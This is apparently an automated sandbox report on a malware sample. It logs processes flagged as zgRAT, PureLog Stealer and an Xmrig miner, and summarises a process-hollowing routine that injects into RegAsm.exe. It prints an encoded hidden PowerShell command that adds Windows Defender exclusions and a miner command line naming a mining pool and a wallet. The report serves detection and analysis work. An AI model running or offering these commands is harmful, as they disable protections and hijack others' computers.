Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7d7830000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	20:41:31
Start date:	18/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x3d0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	20:41:31
Start date:	18/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x1f0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	20:41:31
Start date:	18/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xb10000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	20:41:31
Start date:	18/09/2024
Path:	C:\Users\user\AppData\Roaming\glmIOFfdMi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\glmIOFfdMi.exe"
Imagebase:	0x5c0000
File size:	352'768 bytes
MD5 hash:	C164ED9887BD51CBA150379514DC4E81
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000006.00000002.378512569504.00000000073E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.378512569504.00000000073E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000006.00000002.378512569504.00000000073E0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.378430242891.0000000003CCB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.378430242891.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	20:41:31
Start date:	18/09/2024
Path:	C:\Users\user\AppData\Roaming\YZRVUYjilL.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\YZRVUYjilL.exe"
Imagebase:	0x1f52c990000
File size:	729'600 bytes
MD5 hash:	FD3AD0AE7FE1BBEE4B2F2BD43A359393
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.375920601322.000001F52CF50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.375928489806.000001F53EC95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.375928489806.000001F53EA65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000007.00000002.375920946820.000001F52E994000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000007.00000002.375941467848.000001F547619000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.375928489806.000001F53E761000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.375920946820.000001F52E761000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000007.00000002.375920946820.000001F52E93B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	20:41:34
Start date:	18/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==
Imagebase:	0x7ff7ba2c0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	20:41:35
Start date:	18/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7d7830000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	20:41:35
Start date:	18/09/2024
Path:	C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
Imagebase:	0x21ea8be0000
File size:	729'600 bytes
MD5 hash:	FD3AD0AE7FE1BBEE4B2F2BD43A359393
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000A.00000002.375954186503.0000021EAAA61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000A.00000002.375975223417.0000021EBAF95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000A.00000002.375975223417.0000021EBADB5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000A.00000002.375975223417.0000021EBABB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 0000000A.00000002.375954186503.0000021EAADD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000A.00000002.375975223417.0000021EBAD65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	20:41:36
Start date:	18/09/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff65d6a0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	20:41:37
Start date:	18/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
Imagebase:	0x245ca6f0000
File size:	45'472 bytes
MD5 hash:	DC67ADE51149EC0C373A379473895BA1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000002.378376086685.00000245CC611000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.378458637252.00000245DD851000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000C.00000002.378458637252.00000245DD851000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.378458637252.00000245DD3EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	20:41:47
Start date:	18/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Imagebase:	0x1fb39630000
File size:	42'800 bytes
MD5 hash:	929EA1AF28AFEA2A3311FD4297425C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.378432123906.000001FB39807000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.378432123906.000001FB3983F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.378432123906.000001FB39877000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.378358238334.0000000140799000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.378358238334.0000000140465000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000D.00000002.378358238334.0000000140465000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.378358238334.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	20:41:57
Start date:	18/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\QgL1KOz6bqKO.bat" "
Imagebase:	0xdf0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	20:41:57
Start date:	18/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7d7830000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	20:41:57
Start date:	18/09/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x9d0000
File size:	12'800 bytes
MD5 hash:	41146159AA3D41A92B53ED311EE15693
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	20:41:57
Start date:	18/09/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping -n 5 localhost
Imagebase:	0x7c0000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	20:41:59
Start date:	18/09/2024
Path:	C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
Imagebase:	0x180e1b60000
File size:	729'600 bytes
MD5 hash:	FD3AD0AE7FE1BBEE4B2F2BD43A359393
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000002.376484616059.00000180E3942000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000002.376494366801.00000180F3D65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000002.376494366801.00000180F3B85000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000002.376494366801.00000180F3981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000002.376494366801.00000180F3B35000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000002.376484616059.00000180E3831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	20:42:01
Start date:	18/09/2024
Path:	C:\Users\user\AppData\Roaming\l6E.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\l6E.exe"
Imagebase:	0x200000
File size:	354'168 bytes
MD5 hash:	FAC2188E4A28A0CF32BF4417D797B0F8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 29%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	20:42:01
Start date:	18/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7d7830000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	20:42:03
Start date:	18/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xca0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	20:42:04
Start date:	18/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff7740b0000
File size:	57'360 bytes
MD5 hash:	F586835082F632DC8D9404D83BC16316
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	20:42:04
Start date:	18/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 9052 -ip 9052
Imagebase:	0x8a0000
File size:	482'640 bytes
MD5 hash:	40A149513D721F096DDF50C04DA2F01F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	20:42:04
Start date:	18/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 9052 -s 1740
Imagebase:	0x8a0000
File size:	482'640 bytes
MD5 hash:	40A149513D721F096DDF50C04DA2F01F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	20:42:09
Start date:	18/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Imagebase:	0x7ff7740b0000
File size:	57'360 bytes
MD5 hash:	F586835082F632DC8D9404D83BC16316
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	36%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	38.2%
Total number of Nodes:	34
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 029C2165 Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029C20D7,029C20C7), ref: 029C22D4
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 029C22E7
Wow64GetThreadContext.KERNEL32(000003D4,00000000), ref: 029C2305
ReadProcessMemory.KERNELBASE(000003D8,?,029C211B,00000004,00000000), ref: 029C2329
VirtualAllocEx.KERNELBASE(000003D8,?,?,00003000,00000040), ref: 029C2354
TerminateProcess.KERNELBASE(000003D8,00000000), ref: 029C2373
WriteProcessMemory.KERNELBASE(000003D8,00000000,?,?,00000000,?), ref: 029C23AC
WriteProcessMemory.KERNELBASE(000003D8,00400000,?,?,00000000,?,00000028), ref: 029C23F7
WriteProcessMemory.KERNELBASE(000003D8,?,?,00000004,00000000), ref: 029C2435
Wow64SetThreadContext.KERNEL32(000003D4,027B0000), ref: 029C2471
ResumeThread.KERNELBASE(000003D4), ref: 029C2480

Strings

GetThreadContext, xrefs: 029C223F
CreateProcessA, xrefs: 029C2219
VirtualAllocEx, xrefs: 029C2265
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 029C22D3
TerminateProcess, xrefs: 029C2363
GetP, xrefs: 029C21E7
SetThreadContext, xrefs: 029C228B
Load, xrefs: 029C21A3
ResumeThread, xrefs: 029C22A1
aryA, xrefs: 029C21AB
WriteProcessMemory, xrefs: 029C2278
ress, xrefs: 029C21EF
ReadProcessMemory, xrefs: 029C2252
VirtualAlloc, xrefs: 029C222C

Memory Dump Source

Source File: 00000000.00000002.375887906293.00000000029C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29c1000_PT54FFSL7ET46RASB.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-1257834847
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: b05bfa6622140c9f3dbedb7b7721a9aa8832d7a83eaf676c383b8232819655fe
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 08B1D57664024AAFDB60CF68CC80BDA77A9FF88714F158524EA0CAB341D774FA51CB94

Function 00E40B8F Relevance: 1.8, APIs: 1, Instructions: 293
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(039C3590,029C24D0,?,00000064,?,?,?,?,039C3590,?,?,00E40A34,00000064,00000040), ref: 00E40F31

Memory Dump Source

Source File: 00000000.00000002.375887337175.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_PT54FFSL7ET46RASB.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 22d41f65f8960775539cee80db2a96dcc46c747519ba3707e36d2d3b9606ed7c
Instruction ID: 6fcbc26e8ca39595a7b085cd4a7a3ecab31d8fd38464b6a197bd9b5f7c37d887
Opcode Fuzzy Hash: 22d41f65f8960775539cee80db2a96dcc46c747519ba3707e36d2d3b9606ed7c
Instruction Fuzzy Hash: 91B18A71A042189FCB01CFA8D580AEDFBF2BF98314F2485A5E958F7246C775AD40CBA4

Function 00E40500 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(039C3590,029C24D0,?,00000064,?,?,?,?,039C3590,?,?,00E40A34,00000064,00000040), ref: 00E40F31

Memory Dump Source

Source File: 00000000.00000002.375887337175.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_PT54FFSL7ET46RASB.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: fa196e59c66677dabc1234916925bda787917f0d957d483cc72a81465fd81379
Instruction ID: 4546649b7cfb652aab99e466713485ae696f7ce8391733de21803e33f53de63e
Opcode Fuzzy Hash: fa196e59c66677dabc1234916925bda787917f0d957d483cc72a81465fd81379
Instruction Fuzzy Hash: D821E575D01219AFCB10DF9AD984ADEFBB4FB48710F10812AE918B7340C3B46954CBA1

Function 00A9D01D Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.375886578891.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a9d000_PT54FFSL7ET46RASB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d10ef23dbbc4a11350aa44ff82c8fc17ef2ad5d264a32c2c815681c3960a11b
Instruction ID: e460ae3488e9a7f15a41113db0266ff795346062d399176afbc5a44839b97dff
Opcode Fuzzy Hash: 3d10ef23dbbc4a11350aa44ff82c8fc17ef2ad5d264a32c2c815681c3960a11b
Instruction Fuzzy Hash: B901A7716043849EEB204B19CD84B67FFE8EF51774F188125ED4A1F282D37E9981C6B1

Function 00A9D006 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.375886578891.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a9d000_PT54FFSL7ET46RASB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5821c65687f2d96be7ca4ffc261e7d84bf2217ee6c4cd0c9af4db0a434a3db96
Instruction ID: 1b65c54e28e6b477e326e325bc12ffd25d5fcd347b24a917012ce066a36f9ceb
Opcode Fuzzy Hash: 5821c65687f2d96be7ca4ffc261e7d84bf2217ee6c4cd0c9af4db0a434a3db96
Instruction Fuzzy Hash: D4015E7150D3C09EE7128B258C94B52BFB8EF52624F1980DBE9899F2D3C26D9844C772

Analysis Process: RegAsm.exePID: 6856, Parent PID: 3088COMMON

Execution Graph

Execution Coverage:	5.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	59

Executed Functions

Function 004038C0 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 401
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(shell32.dll), ref: 0040390A

Strings

.exe, xrefs: 004039E4, 004039F5, 00403C28, 00403C39
open, xrefs: 00403E04, 00403E25
shell32.dll, xrefs: 00403905

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID: .exe$open$shell32.dll
API String ID: 1029625771-3690275032
Opcode ID: 5fe2b311168ee18d35339af2a02642367244109c8334c18b3b10726bc25dbb19
Instruction ID: 088f1b5ea99a5cdeca3a362f7bf00bb5554626ca33ca4133f18bdeb2bd32dcca
Opcode Fuzzy Hash: 5fe2b311168ee18d35339af2a02642367244109c8334c18b3b10726bc25dbb19
Instruction Fuzzy Hash: 5DE12A312083409BE718CF28C845B6FBBE5BF85305F24462DF489AB2D2D779E6458B5A

Function 0041FEAF Relevance: 9.3, APIs: 6, Instructions: 273
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041FB65: CreateFileW.KERNELBASE(?,00000000,?,0041FF58,?,?,00000000,?,0041FF58,?,0000000C), ref: 0041FB82

GetLastError.KERNEL32 ref: 0041FFC3
GetFileType.KERNELBASE(00000000), ref: 0041FFD6
GetLastError.KERNEL32 ref: 0041FFE0
CloseHandle.KERNEL32(00000000), ref: 00420009
CloseHandle.KERNEL32(?), ref: 00420156
GetLastError.KERNEL32 ref: 00420188

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$CloseFileHandle$CreateType
String ID:
API String ID: 3086256261-0
